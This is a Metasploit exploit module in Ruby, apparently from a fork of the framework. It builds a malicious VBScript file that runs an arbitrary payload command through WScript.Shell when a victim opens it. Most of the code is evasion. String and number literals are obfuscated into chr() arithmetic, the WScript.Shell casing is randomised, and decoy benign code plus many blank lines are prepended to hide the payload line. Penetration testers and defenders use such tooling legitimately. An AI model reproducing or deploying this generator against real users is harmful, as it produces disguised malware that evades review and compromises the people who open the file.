adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
b59fd1c61a4652c2e809a018150b154d3acdb625
metasploit-gs/modules/exploits/windows/fileformat/windows_script_host_vbscript.rb
T

221 lines
6.2 KiB
Ruby
Raw Blame History

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Malicious Windows Script Host VBScript (.vbs) File',
'Description' => %q{
This module creates a Windows Script Host (WSH) VBScript (.vbs) file.
},
'License' => MSF_LICENSE,
'Author' => [
'bcoles'
],
'References' => [
['ATT&CK', Mitre::Attack::Technique::T1204_002_MALICIOUS_FILE],
],
'Arch' => [ARCH_CMD],
'Platform' => 'win',
'Payload' => {
'Space' => 8_000, # 8190 maximum command length, minus some space for "cmd.exe /c " and escaping
'BadChars' => "\x00",
'DisableNops' => true
},
'Targets' => [
[
'Microsoft Windows 98 or newer', {}
],
],
'Privileged' => false,
'DisclosureDate' => '1998-06-25', # Windows 98 release date
'DefaultTarget' => 0,
'DefaultOptions' => {
'DisablePayloadHandler' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [SCREEN_EFFECTS]
}
)
)
register_options([
OptString.new('FILENAME', [true, 'The VBScript file name.', 'msf.vbs']),
OptBool.new('OBFUSCATE', [false, 'Enable VBScript obfuscation', true])
])
register_advanced_options([
OptBool.new('PrependBenignCode', [false, 'Prepend several lines of benign code at the start of the file.', true]),
OptInt.new('PrependNewLines', [false, 'Prepend new lines before the malicious VBScript.', 100]),
])
end
# Returns a random math expression evaluating to input int
#
# @param [Integer] int input integer
#
# @return [String] math expression evaluating to input int
def generate_number_expression(int)
case rand(4)
when 0 # Sum
a = rand(0..int)
b = int - a
"(#{a}+#{b})"
when 1 # Difference
r1 = int + rand(1..10)
r2 = r1 - int
"(#{r1}-#{r2})"
when 2 # Product (only if divisible)
divisors = (1..int).select { |d| (int % d).zero? }
if divisors.size > 1
d = divisors.sample
"(#{d}*#{int / d})"
else
"(#{int}+0)"
end
when 3 # Quotient
r2 = rand(1..10)
r1 = int * r2
"(#{r1}/#{r2})"
end
end
# Return VBScript code with all strings split into chunks and concatenated
#
# @param [String] vbscript VBScript code
#
# @return [String] VBScript code with chunked strings
def chunk_vbscript_strings(vbscript)
vbscript.gsub(/"([^"]+)"/) do
original = Regexp.last_match(1)
chunks = []
i = 0
while i < original.length
chunk_size = rand(1..5)
chunks << "\"#{original[i, chunk_size]}\""
i += chunk_size
end
chunks.join(' & ')
end
end
# Build a series of benign VBScript noise blocks
#
# @param [Integer] block_count Number of blocks to generate
#
# @return [String] block_count blocks of inert VBScript
def generate_vbscript_noise(block_count = 0)
lines = []
block_count.times do
case rand(4)
when 0 # Dummy variable declarations and assignments
v1 = rand_text_alpha(6..16)
v2 = rand_text_alpha(6..16)
a = rand(0..100)
b = rand(0..100)
lines << "Dim #{v1}, #{v2}"
lines << "#{v1} = #{a}"
lines << "#{v2} = #{b}"
when 1 # Dummy Function
fname = rand_text_alpha(6..16)
arg = rand_text_alpha(6..16)
mult = rand(1..5)
lines << "Function #{fname}(#{arg})"
lines << " #{fname} = #{arg} * #{mult}"
lines << 'End Function'
when 2 # Dummy Sub
sname = rand_text_alpha(6..16)
arg = rand_text_alpha(6..16)
mult = rand(1..5)
lines << "Sub #{sname}(#{arg})"
lines << " #{sname} = #{arg} * #{mult}"
lines << 'End Sub'
when 3 # Dummy For loop
idx = rand_text_alpha(6..16)
max = rand(1..5)
lines << "Dim #{idx}"
lines << "For #{idx} = 1 To #{max}"
lines << " #{idx} = #{idx} + 0"
lines << 'Next'
end
end
lines.join("\r\n")
end
# Obfuscate string literals and integer literals
#
# @param [String] vbscript VBScript code to be obfuscated
#
# @return [String] Obfuscated VBScript
def obfuscate_vbscript(vbscript)
obfuscated = vbscript.dup
# Obfuscate strings
obfuscated = chunk_vbscript_strings(obfuscated)
obfuscated.gsub!(/"((?:[^"]|"")*)"/) do
raw = ::Regexp.last_match(1).gsub('""', '"')
raw.chars.map { |c| "chr(#{generate_number_expression(c.ord)})" }.join(' & ')
end
# Obfuscate integers
obfuscated.gsub!(/\b\d+\b/) do |num|
generate_number_expression(num.to_i)
end
obfuscated
end
def generate_vbscript(command_string, prepend_benign_code: false, prepend_new_lines: 0, obfuscate: false)
vbs = ''
vbs << generate_vbscript_noise(rand(8..10)) if prepend_benign_code
vbs << "\r\n" * prepend_new_lines
escaped_payload = command_string.gsub('\\', '\\\\\\').gsub('"', '\\"')
# If the payload contains " & " we presume it is a command string.
#
# TODO: Change this once Metasploit is able to inform a module that
# the specified ARCH_CMD payload is a string of commands
# (not a single command).
if escaped_payload.include?(' & ')
cmd = "cmd.exe /c #{escaped_payload}"
else
cmd = escaped_payload
end
shell_obj = 'WScript.Shell'.chars.map { |c| (rand(2) == 0 ? c.downcase : c.upcase) }.join
vbs_payload = "CreateObject(\"#{shell_obj}\").Run(\"#{cmd}\")"
if obfuscate
vbs << obfuscate_vbscript(vbs_payload)
else
vbs << vbs_payload
end
vbs
end
def exploit
vbs = generate_vbscript(
payload.encoded,
prepend_benign_code: datastore['PrependBenignCode'],
prepend_new_lines: datastore['PrependNewLines'],
obfuscate: datastore['OBFUSCATE']
)
file_create(vbs)
end
end
Reference in New Issue View Git Blame Copy Permalink